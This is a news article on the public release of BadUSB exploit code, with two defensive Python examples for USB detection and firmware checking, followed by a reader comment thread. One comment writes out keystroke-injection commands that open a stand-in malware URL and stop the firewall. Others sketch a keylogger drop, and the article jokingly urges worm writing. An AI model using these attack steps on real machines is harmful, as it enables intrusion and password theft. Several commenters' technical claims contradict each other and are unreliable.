Back in July, we wrote about a massive security hole — BadUSB — that potentially gave hackers the ability to hijack or subvert billions of USB devices, from keyboards to printers to thumb drives. At the time, due to the severity of the issue, the researchers who discovered the flaw didn’t publish their BadUSB exploit code. Now, however, two other hackers have worked out how to exploit BadUSB — and they’ve published their code on Github for all to see. The pressure is now on device makers to actually fix the flaw before millions of users have their USB devices and peripherals exploited — which is a problem, because there’s really no easy fix for BadUSB.

For the full low-down on BadUSB, I suggest you read our original story from July. In short, though, every USB device has a microcontroller — a small chip that acts as an interface between the device (a keyboard, a flash drive) and the host (your PC). This chip often has software (firmware) that can be reprogrammed to do nefarious things, such as logging your keystrokes, infecting your PC with malware, or something much worse. BadUSB is highly dangerous for one key reason: It’s very hard to detect, even for virus scanners.

A code fragment from the reprogrammed firmware

The guys who originally discovered BadUSB — Karsten Nohl and friends at SR Labs — announced the bug’s existence in July, and presumably shared more details with device makers and the USB Implementers Forum, but they did not share actual proof-of-concept code for fear that other, slightly-less-benevolent hackers would use this zero-day vulnerability for nefarious purposes. Now, however, two hackers at Derbycon in Kentucky have discovered the same BadUSB flaw — and, more importantly, they’ve published their proof-of-concept on Github. If you know what you’re doing, you can grab the code and start exploiting USB devices straight away. Go wild: The first person to write a self-replicating worm that key logs passwords and other sensitive data stands to make millions — nay, billions — of dollars.

The two security researchers — Adam Caudill and Brandon Wilson — justified their release to the Derbycon audience with the following: “The belief we have is that all of this should be public. It shouldn’t be held back. So we’re releasing everything we’ve got. This was largely inspired by the fact that [SR Labs] didn’t release their material. If you’re going to prove that there’s a flaw, you need to release the material so people can defend against it.” Their rationale, while somewhat reckless, isn’t entirely misguided: BadUSB is potentially a huge issue, and someone needs to light a fire under the collective derriere of USB device makers so that they actually try to fix it. As always with vulnerabilities like this, it’s impossible to say how long it’s been used — by black hat hackers, by the NSA — before someone like Nohl, Caudill, or Wilson publicly discloses it.

The USB controller chip is the big chip in the middle (they don’t usually have a skull silkscreened onto them though).

Caudill and Wilson succeeded in reprogramming the firmware of a Phison USB microcontroller, so that when it’s plugged into a host computer it impersonates a keyboard that types whatever keystrokes the attacker wants. This hacked USB microcontroller could be inside a thumb drive, mouse, printer — it doesn’t matter. Phison is one of the world’s largest makers of USB microcontrollers — and it’s important to note that, at least as far as we know, it’s only Phison microcontrollers that have had their firmware reprogrammed by hackers. Other microcontrollers are probably vulnerable in a similar way, but no one has published any vulnerabilities… yet.
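The impersonation described above reaches the host only as USB descriptors, so the host’s enumeration events are the place a defender can look. The Python below is an added example, not code from the article or from Caudill and Wilson: it parses USB configuration descriptors into interface class/subclass/protocol triples and then flags the patterns a reprogrammed stick produces (storage and keyboard in one configuration, a port that was carrying storage re-enumerating as a keyboard, an extra keyboard from an untrusted VID:PID). The descriptor bytes, VID:PID values, port paths and function names are all constructed for the example.

```python
"""Host-side detection of a storage device that also presents a keyboard.

Added example; not code from the article, SR Labs, or Caudill and Wilson.
parse_interfaces() walks a USB configuration descriptor (the bytes a device
returns to GET_DESCRIPTOR) and lists each interface's class/subclass/protocol.
analyze() then applies three defender heuristics over attach events.
Descriptor bytes, VID/PID values and port paths below are all constructed.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

USB_CLASS_HID, USB_CLASS_MASS_STORAGE = 0x03, 0x08
HID_PROTOCOL_KEYBOARD = 0x01
DT_CONFIGURATION, DT_INTERFACE = 0x02, 0x04


def parse_interfaces(config: bytes) -> List[Tuple[int, int, int]]:
    """Return (bInterfaceClass, bInterfaceSubClass, bInterfaceProtocol) for
    every interface descriptor inside a configuration descriptor."""
    if len(config) < 9 or config[1] != DT_CONFIGURATION:
        raise ValueError("not a configuration descriptor")
    total = struct.unpack_from("<H", config, 2)[0]          # wTotalLength
    if total > len(config):
        raise ValueError("wTotalLength exceeds buffer")
    out, off = [], 0
    while off + 2 <= total:
        blen, btype = config[off], config[off + 1]
        if blen < 2 or off + blen > total:
            raise ValueError("malformed descriptor at offset %d" % off)
        if btype == DT_INTERFACE and blen >= 9:
            out.append((config[off + 5], config[off + 6], config[off + 7]))
        off += blen                                          # skip endpoint/HID/etc.
    return out


def build_config(interfaces) -> bytes:
    """Constructed helper: a minimal configuration descriptor with one
    endpoint-less interface descriptor per (class, subclass, protocol)."""
    body = b"".join(struct.pack("<9B", 9, DT_INTERFACE, n, 0, 0, c, s, p, 0)
                    for n, (c, s, p) in enumerate(interfaces))
    return struct.pack("<BBHBBBBB", 9, DT_CONFIGURATION, 9 + len(body),
                       len(interfaces), 1, 0, 0x80, 50) + body


@dataclass(frozen=True)
class AttachEvent:
    t: float       # seconds since monitoring started
    port: str      # physical port path, e.g. "1-2.3" (constructed)
    vid: int
    pid: int
    config: bytes  # configuration descriptor the device returned


def roles(ev: AttachEvent) -> Tuple[bool, bool]:
    """(presents a keyboard, presents mass storage) for one attach event."""
    ifs = parse_interfaces(ev.config)
    kbd = any(c == USB_CLASS_HID and p == HID_PROTOCOL_KEYBOARD for c, _, p in ifs)
    return kbd, any(c == USB_CLASS_MASS_STORAGE for c, _, _ in ifs)


def analyze(events, trusted: Optional[Set[Tuple[int, int]]] = None) -> List[Tuple[str, str]]:
    """Return (port, reason) findings in time order."""
    trusted = trusted or set()
    findings, last_role, keyboards_seen = [], {}, 0
    for ev in sorted(events, key=lambda e: e.t):
        kbd, stor = roles(ev)
        if (ev.vid, ev.pid) not in trusted:
            if kbd and stor:
                findings.append((ev.port, "composite device exposes storage and a keyboard"))
            elif kbd and last_role.get(ev.port) == "storage":
                findings.append((ev.port, "port re-enumerated from storage to keyboard"))
            elif kbd and keyboards_seen > 0:
                findings.append((ev.port, "additional keyboard from untrusted VID:PID"))
        keyboards_seen += kbd
        last_role[ev.port] = "keyboard" if kbd else "storage" if stor else "other"
    return findings


# Constructed session: trusted built-in keyboard; a stick on port 1-2.3 that
# briefly re-enumerates as a keyboard; a composite stick on port 1-4.
KBD = build_config([(USB_CLASS_HID, 0x01, HID_PROTOCOL_KEYBOARD)])
MSC = build_config([(USB_CLASS_MASS_STORAGE, 0x06, 0x50)])      # SCSI, bulk-only
BOTH = build_config([(USB_CLASS_MASS_STORAGE, 0x06, 0x50),
                     (USB_CLASS_HID, 0x01, HID_PROTOCOL_KEYBOARD)])
TRUSTED = {(0x1234, 0x0001)}                                    # constructed VID:PID
SAMPLE_EVENTS = [
    AttachEvent(0.0, "1-1", 0x1234, 0x0001, KBD),
    AttachEvent(5.0, "1-2.3", 0x5678, 0x0010, MSC),
    AttachEvent(6.5, "1-2.3", 0x5678, 0x0010, KBD),
    AttachEvent(7.2, "1-2.3", 0x5678, 0x0010, MSC),
    AttachEvent(20.0, "1-4", 0x9ABC, 0x0002, BOTH),
]


def run_demo() -> List[Tuple[str, str]]:
    return analyze(SAMPLE_EVENTS, TRUSTED)


if __name__ == "__main__":
    for port, reason in run_demo():
        print(f"port {port}: {reason}")
```

The descriptor layout parsed here is the standard USB 2.0 one (the same data `lsusb -v` decodes), so a real monitor would feed `parse_interfaces()` the bytes the OS already has for each attached device; the constructed session is only there to exercise the three heuristics. The third heuristic is deliberately weak on its own, since a user plugging in a second legitimate keyboard trips it, which is why the port-history and composite-device checks come first.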

Funnily enough, using a PS/2 mouse and keyboard is actually a good idea, too.

Moving forward, the problem with BadUSB — other than the fact that it’s very hard to detect — is that it’s almost impossible to plug the hole. Short of the host (your PC) ensuring that the USB device hasn’t had its firmware meddled with — something that would require the host to check with a global database of firmware cryptographic signatures — there isn’t really a solution. Future devices could avoid using reprogrammable USB microcontrollers, instead opting for hard-coded ASICs or ROMs — but in many cases that might not be financially possible.
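The paragraph above says a real fix would need the host to check device firmware against a global database of signatures. The Python below is an added example, not from the article or from any vendor, showing why that check is hard to make meaningful: a SHA-256 allow-list models the database, and a modelled controller can answer a firmware-read request with the genuine image while running a modified one. The firmware images, digests, VID:PID values and class and function names are all constructed assumptions.

```python
"""Why a host-side firmware check alone does not close BadUSB.

Added example, not from the article. KNOWN_GOOD stands in for the "global
database of firmware signatures" the text mentions, holding SHA-256 digests
of genuine images per VID:PID. host_check() hashes whatever image the device
returns to a firmware-read request. A reprogrammed controller owns that
read-back path, so it can return the genuine image while running a modified
one; only a check the controller performs on the image it is about to run
(bootloader_check() here) sees the real one. Everything below is constructed.
"""
import hashlib
from typing import Dict, Optional, Set, Tuple


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for real controller firmware images.
GENUINE_FW = b"constructed-controller-fw v1.00: mass storage only"
MODIFIED_FW = GENUINE_FW + b" + hidden HID keyboard"

# Constructed allow-list: (vid, pid) -> digests of every known-good release.
KNOWN_GOOD: Dict[Tuple[int, int], Set[str]] = {
    (0x1234, 0x5678): {sha256(GENUINE_FW)},
}


class Controller:
    """Model of a USB microcontroller: the image it runs, and the image it
    hands back when the host asks to read firmware (identical on an honest
    part; a reprogrammed part can decouple the two)."""

    def __init__(self, vid: int, pid: int, running: bytes,
                 read_back: Optional[bytes] = None):
        self.vid, self.pid = vid, pid
        self.running = running
        self.read_back = running if read_back is None else read_back

    def read_firmware(self) -> bytes:
        return self.read_back


def classify(vid: int, pid: int, image: bytes) -> str:
    """Look the image's digest up in the allow-list."""
    good = KNOWN_GOOD.get((vid, pid))
    if good is None:
        return "unknown-device"
    return "known-good" if sha256(image) in good else "modified-or-unlisted"


def host_check(dev: Controller) -> str:
    """What a PC can do: verify the image the device chooses to report."""
    return classify(dev.vid, dev.pid, dev.read_firmware())


def bootloader_check(dev: Controller) -> str:
    """What the controller would have to do in ROM: verify the image it is
    actually about to execute, before any device class is presented."""
    return classify(dev.vid, dev.pid, dev.running)


HONEST = Controller(0x1234, 0x5678, GENUINE_FW)
REFLASHED = Controller(0x1234, 0x5678, MODIFIED_FW)                      # does not hide
CLOAKED = Controller(0x1234, 0x5678, MODIFIED_FW, read_back=GENUINE_FW)  # lies on read-back
NO_ENTRY = Controller(0x9ABC, 0x0001, GENUINE_FW)                        # vendor not listed


def run_demo() -> Dict[str, Tuple[str, str]]:
    """(host verdict, bootloader verdict) for each constructed device."""
    return {name: (host_check(d), bootloader_check(d))
            for name, d in [("honest", HONEST), ("reflashed", REFLASHED),
                            ("cloaked", CLOAKED), ("no_entry", NO_ENTRY)]}


if __name__ == "__main__":
    for name, (h, b) in run_demo().items():
        print(f"{name:10s} host={h:22s} bootloader={b}")
```

The "cloaked" case is the one that matters: the host verdict is "known-good" even though the running image is modified, and only the check performed by the controller itself catches it. The "no_entry" case shows the other cost of the database approach the article alludes to: every revision of every controller has to be listed, or the host cannot tell an unlisted genuine part from a tampered one.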

For the time being, the best mitigation against BadUSB and other similar exploits is to maintain good security practices: Keep your software up-to-date, don’t open any files you don’t recognize, and — a bit like safe sex — don’t plug any devices into your computer unless you know where they’ve been.


Someone could go buy a dozen (or 50 or 100, for that matter) USB sticks, hack them and then sell them on eBay for a low price, return them to the store of purchase, or leave them lying around in Starbucks so unknowing customers simply pick them up and use them. Once someone plugs one into their own PC, the hack has complete unrestricted access to mooch data of any type.

Could be pretty nasty. Of course this is small scale... but say some guys got in and were able to flash the firmware on 100k USB chips before they even left the manufacturer, that’d be ugly.

Rentier

yeah, you can’t even share your stick with a friend because his computer might be infected.

Techutante

A (somewhat anarchist) friend of mine used to infect floppy disks and leave them around the school computer lab. Someone would always forget a disk at home, and lo, there’s a free one! Who cares, it’s not your computer! Until they take the disk home too. Or email themselves infected files.

Chesterlots

I still refuse to believe “funnily” is a word… it just sounds so weird when you try to use it casually.

http://www.mrseb.co.uk/ Sebastian Anthony

I think I even managed to use ‘funnest’ once… that was a good day.

Wierd0n3

I find it sadly impressive that they couldn’t just de-solder the write pin from the device once the factory firmware is installed. Heck, half of the motherboards I’ve bought since ’97 have had a “write protect” jumper so the BIOS couldn’t be overwritten unless you have physical access to the case.

SumGuy954

Write pin for the firmware? If only it was clearly marked I would snipe it on all my usb sticks..

Ken B

I can see one (temporary) fix against this. A USB device you plug between host and USB storage. This proxy should not have a reprogrammable controller and only pass data between host computer and USB storage.
Basically it would be hard wired to only allow USB storage. A mouse or keyboard (or a hacked USB storage pretending to be one) would be blocked.

Now there are a whole lot of other USB devices that can’t be protected in the same manner, but it’s a step in the right direction. It’s more likely you move USB storage around than USB printers.

Come to think of it, a reprogrammed USB keyboard controller could be even worse. It would now have unfiltered access to all your keystrokes. It would still need a way to transfer that information to the computer and out on the internet. My guess: It would try to send invalid scancodes that Windows would ignore but that a companion malware could pick up and transfer on the net. But this could be blocked with proper anti-virus/malware software, even though the keylogger feature would remain in your keyboard.

gremlin22

What is the threat exactly?
You plugged a fake keyboard into your PC. What next?
You still type your passwords on the regular keyboard; the fake keyboard is completely inactive. There is a slim chance that it will be able to snoop data that goes over the USB channel on the same hub, but that is really, really difficult to accomplish since no USB controller is actually designed to do it. And then what should it do with the snooped data exactly? A USB device can’t access the network unless it has a cellular modem within.
As far as detection goes, you can easily see an unexpected keyboard in Device Manager.
A fake network device could be a bit more interesting, but it is even easier to detect and no sensitive traffic will go through it unless it can emulate a true network.
Infecting random devices is insanely difficult and will break their normal functionality so they will be very very easy to detect.

All this USB fear mongering rides on vague memories of the way that Stuxnet used USB to infect machines. But for Stuxnet the USB devices were completely normal; it took advantage of an unknown SW vulnerability in Windows.

The only thing that these researchers demonstrated is the ability to reprogram a very specific USB device in the LAB. Anyone that ever developed software for USB devices knew it is possible. But again, what exactly is the scenario that poses a security risk?

imbra

I agree completely. If I were just a little more cynical than I already am, I would only explain this story with “research lab needs more funding, so they blow this thing out of proportion to attract attention.”.

Itsthatbad

No, the “fake” keyboard is just part of the total attack. There are a few devices I know of, at least 2 years old, that play a set of keystrokes back to the computer and download the malicious code that then continues the exploit and sets up the control and command links. It really is as simple as “winkey-r, iexplore http://www.malwarehere.com” sent from a keyboard on many computers to get a PC to become infected. Or… “net stop firewall” or anything you can use a keyboard for (which is more or less anything you can do via GUI). And it happens very quickly. If you’ve never programmed macros and scripts for Windows before, you might not realize that within seconds, your system is hacked. The USB device may or may not need to store any data, just be the start of the process. And since you “typed” it, there isn’t much security to prevent it.

Tom Bayley

The threat is that an infected USB controller can issue malicious keyboard commands to get the PC to install malware stored in its own flash. This is as bad as it gets.

– The keyboard need only be registered for a second and can then disappear again without trace.
– The malware on the flash can easily be hidden from the regular filing system, and hence from antivirus software.
– The USB firmware infection can be cloaked.

– Once infected, the PC can infect the controller on any other USB device, including built-in devices like webcams.

– Antivirus can clean the PC but it can be very quickly reinfected e.g. from a built-in USB device.

Ken B

Indeed. It can act as a USB hub faking several “connected” devices, including keyboard, mouse or even a network controller.
Most likely, though, is opening shady web sites that employ browser exploits to download and run software.

Dave Mullins

It’s pretty simple. It sends a Winkey-R to open the Run dialog, then runs commands to load a keyboard logging program from its internal memory. A few days later it reads the log that program created and scans it to get all your passwords. Do you want me to continue?

Magnus Blomberg

Do you need physical access to the USB device to alter its firmware, or is it enough to compromise the host it’s connected to?

Do all USB controllers have the same flaw? If not, how common are the ones that do?

egil222

There are two things I don’t understand about this issue. First, don’t you need physical access to a USB device in order to compromise it, as you need an EPROM programmer to actually re-write the firmware? Second, at least on Windows, when you plug a USB device into the machine, it puts up a message saying it is installing drivers for your new device and IDs it. Wouldn’t most people think something was wrong if they plugged in a thumb drive and then received a message saying that the machine was installing support for a new keyboard (in the case of a key logger)?

MLOTT

Some devices may load the firmware upon connection. So, if the file on the user’s regular hard drive is altered, that altered firmware would eventually be reloaded, say upon reboot.

My god, what have these noobs done. No way this is going to be fixed for every device. This is the new HIV of computing. Most people can barely update their PCs, let alone their firmware. If this keeps up, computers as we know them are going to be dead.

Hooper

Is it bad I pictured two big metal safes having unprotected sex?

ronch

If the flaw can’t be fixed, then what’s the point? I wish these guys just kept quiet instead of giving people who don’t have anything better to do a crazy idea.

And if it can be fixed, and they released the code to get device maker’s attention(s) and patch their products, yeah right. You think USB flash drive makers will go through all the trouble of fixing their drives’ firmware? For new units, sure, but what about the bajillions of USB flash drives out in the wild? And even if they did address all those drives, it’s unlikely non-techy folks would go through the process of updating their firmware, much less even know what the heck firmware is or how to update it without fear of losing their precious data. And what about the billions of generic, el-cheapo flash drives you buy at the flea market or given away as promotional items?

All in all, I wish they just kept all this to themselves, and tech sites like ET would just keep silent instead of spreading this even further because of news sites’ hunger for articles to run.

Ken B

Let’s not forget the limitations of this, it’s not the end of the world as we know it.
* Can BadUSB infect your computer with a virus? Generally no, it needs software already present on your computer, like malware, or exploiting vulnerabilities in drivers.
* So BadUSB is mostly harmless? Well, no, it can emulate basically any type of USB product. Technically it could emulate a keyboard and mouse, start a CMD prompt and disable/damage your system, or use your browser to visit/download malware.
* Can it sniff your passwords? It certainly can IF it’s your keyboard/mouse that’s infected, but to send this across the internet it needs to be creative. Like emulating a USB switch/router and sending out network packets.
* Can a BadUSB device infect other USB devices? Not directly, it needs software installed on your computer to do it. Unless it emulates a keyboard/mouse and downloads it that way.
* How can you protect yourself? Just detaching the BadUSB will most likely be all you need, without harm to your computer. Leaving it attached is very bad.

Tom Bayley

The threat is that an infected USB controller can issue malicious keyboard commands to get the PC to install malware stored in its own flash. This is as bad as it gets.

Jack Hsiung

you are wrong again.

you shouldn’t call it “infected” because it does NOT infect other USB devices. it infects software on the machine it’s inserted into, but not any other hardware or USB thumb drives.

it’s actually a “maliciously produced” USB controller.

MadisonHJ

If someone beats the crap out of the two security researchers, I wouldn’t be surprised.

Liz Bode

After reading this article, I had a mini heart attack. Almost the whole of the human population uses USBs regularly for everything, and even promoting ‘safe sex’ in a sense with USBs will never be an adequate solution. Like previously said, many people aren’t computer literate enough to keep their computer’s software updated, so asking them to think about safety and solutions when using USBs is asking a lot. I must agree with the other comments, and say that it would have probably been a better idea to keep the whole issue silent. Making it public might bring more focus on the problem to find a solution, but it also has the potential to bring negative publicity which would actually lead to a greater problem in the long run. Yet, I must acknowledge that I am glad I read this article, because now I can be more cautious with USB devices myself.

BobGuy

Good for these fellows… It is really good that they don’t have custody of the Smallpox or Spanish influenza virus. Pelosi said they have to pass it so we can see what’s in it. Sometimes it is better to keep things locked up…

Jack Hsiung

way too many limitations for this to be a real threat. the same exploit can be said of any device that plugs into a computer.

Tom Bayley

No. Other devices are not reprogrammable the way USB is. The reprogrammability allows for infection.

Jack Hsiung

you are wrong. as the article has clearly mentioned, the hack has to be programmed at the manufacturer which is extremely highly unlikely.

it’s not “reprogrammed”, it’s actually “programmed” with a virus at the manufacturer.

Tom Bayley

All USB controllers are reprogrammable. There is a Youtube video of the SRLabs BlackHat presentation in which they show their code infecting a fresh USB stick. The guy is hard to understand but here is the relevant section of the demo:

the virus HAS TO ALREADY BE IN CONTROLLER CHIPS WITHIN THE USB STICK for the virus to work.

same can be said for ANY computer part. if a manufacturer programs the flash to have a virus inside, any part of your PC flash can do the same thing. your mouse can be programmed to track your movement, your keyboard can be programmed to track keys typed, and the BIOS can be programmed to do anything. but the requirement is, it has to be programmed/FLASHED by the manufacturer or manually (physically) by a hacker.

stop spreading FUD please

Tom Bayley

Good to see you removed your last sentence “you lost. period”. This is not about winning or losing, it’s about the facts. If you can prove you are right then I will freely admit I’m wrong. But I have already posted evidence from the same guys who discovered this problem – so it would be good to know where you think they are wrong.

Jack Hsiung

your “evidence” is wrong because you read the fact(s) incorrectly because they intentionally presented fact however in a “misleading” way to mislead people (for profit? paid by apple?)

read my comment on the video and you’ll understand the fact and how they tried to mislead people in the wrong direction.

let me make this easy for you. this bug/hack can be said of 99% of all programmable devices and the chance of it happening is almost next to nothing. no manufacturer would risk their reputation for a stunt like this. PERIOD.

Tom Bayley

I saw a comment on the video but it is in Chinese and I’m sorry I can’t understand it.

No need to make it easy for me. I’ve spent 25 years as a software developer and I should be able to understand any technical explanation you can point to. Can you provide a link maybe?

Jack Hsiung

if you have ever written any code to interface software to hardware, you’d know that it’s impossible to write a virus that would flash ALL EEPROMs at run time, therefore reducing this so-called “badUSB” virus to basically a “programmer error” or “manufacturer error”, aka you’d ONLY get it from USB manufacturers who KNOWINGLY put it in.

and 99.99999% of manufacturers don’t knowingly put a virus in their hardware, therefore reducing this to be almost like a hoax, or perhaps these people are being paid by Apple to bad mouth anything with a USB input (since crapple phones/tablets don’t get USB at all)

Tom Bayley

I can see you’ve edited your post changing “impossible to flash eeprome at run time” to “impossible to flash ALL eeprome at run time”. So you are learning as you go, which is fine, as I am too. But in that case best not to be too cocky, huh?

USB devices these days can have their firmware in flash rather than eeprom, which clearly makes sense for a device that already has plenty of flash memory… http://en.wikipedia.org/wiki/Flash_memory_controller “Some part of the spare cells is also used to hold the firmware which operates the controller”

I have found sources that say DFU mode is not often implemented in simple thumb drives, but clearly it *is* supported in the Phison manufactured products used in the Black Hat demo, where it was claimed Phison is the largest manufacturer in the world. The reprogrammability is confirmed here: http://en.wikipedia.org/wiki/Phison

DFU mode is unique to the device and requires admin access, so your argument is moot .. again

clearly you have NO IDEA of anything in this realm. please, please, stop spreading FUD.

Tom Bayley

I’m not trying to make an argument. I’m trying to get the facts straight! Sheesh! We are both just random guys on the web – why get so hot about it?

If you really want to stop FUD you should learn how to discuss things with tolerance. You become more believable that way. The only reason this has gone on so long is that you come across as immature and therefore hard to trust.

1) Changing firmware is pointless, the vulnerability involves replacing the old firmware.
2) Most USB devices have the firmware data line cut, so they are invulnerable to this hack.
3) EEPROMs vary so much between USB devices that creating a hack that gets all of them is unlikely.
4) Once everyone does #2 this vulnerability will disappear.

Exactly mirrors what I tried to explain to you. so, just admit you were misinformed and get this over with.

Tom Bayley

You are quoting from some random guy who commented on an article about BadUSB?

Point 1) seems irrelevant.
Point 2) is ridiculous – USB requires the data lines to be intact or else no data can be transferred.
Point 3) is kind of valid, but you don’t need to cover ALL the devices, just a significant number. And a lot of different devices contain the same code from a small number of major suppliers (including Phison.)
Point 4) I think he really means removing or disabling the DFU mode, which is the kind of thing the Black Hat presenters recommended.

I will admit this is not as serious as it has been billed, but clearly there IS a mechanism here that can pose a threat. And you have been denying that, which I think is too complacent.

Jack Hsiung

1. totally relevant and reverberates with what I’ve been trying to point out… the vulnerability is a firmware flash which comes directly from the manufacturer, therefore it does not spread to other USBs
2. you are wrong … again.. I don’t think you get it.. it’s the firmware data line, not the USB data line
3. you are wrong again and again. rarely if at all do USB devices contain the same code, even from the same manufacturer. Phison is the only one affected and it’s only in 1 of its USB lines that the virus actually spreads.
4. no, he meant that if we disable reprogrammability/cut the data line after the firmware is implemented into the thumbdrive, then ppl can no longer manipulate its firmware.

clearly there is a mechanism to pose a threat to ONLY A SINGLE PRODUCT FROM A SINGLE MANUFACTURER.

Jack Hsiung

talk about immature…you are the one being immature with your FUD..

your very first comment is blatantly false: “No. Other devices are not reprogrammable the way USB is. The reprogrammability allows for infection.”

reprogrammability is not allowing for infection.

i was only trying to correct you but you weren’t listening.

period. you were wrong. just admit it and stop further fudding

ryansssss

Just develop a piece of code that prevents Phison-controlled devices from mounting. Boom!

RobF

People here seem to think this is a non-problem, but I can imagine a few scenarios without much trouble why this is a big deal. For example, I would never use one, but people, especially including school children, use library computers (public or school) to do work with USB drives. Business centers in hotels, you name it, could be a way for someone to circulate key loggers, not only on the public PC, but then on any PC that the victim takes his USB device to subsequently. Also, not cool for the exploit details to be made public. Yes, they lit a fire under the equipment makers, but that’s like saying an arsonist is absolved because he showed home owners that their house needs fire protection by setting it on fire!

I’m with the guys about just getting devices with disabled write lines to the USB device firmware. I mean, really, who has ever had to flash their keyboard or memory stick? That prevents the spread from PC to USB device. As for preventing a USB sleeper device from sending commands to the PC, that requires a far more complicated system to, at a minimum, read the firmware, check it against known good or known bad signatures, and then disable it somehow. I guess they could be sold blank and rely on the OS to burn them the first time, like the OS identifies the drivers for a new device, then blow a fuse to prevent further changes… Nahhh…
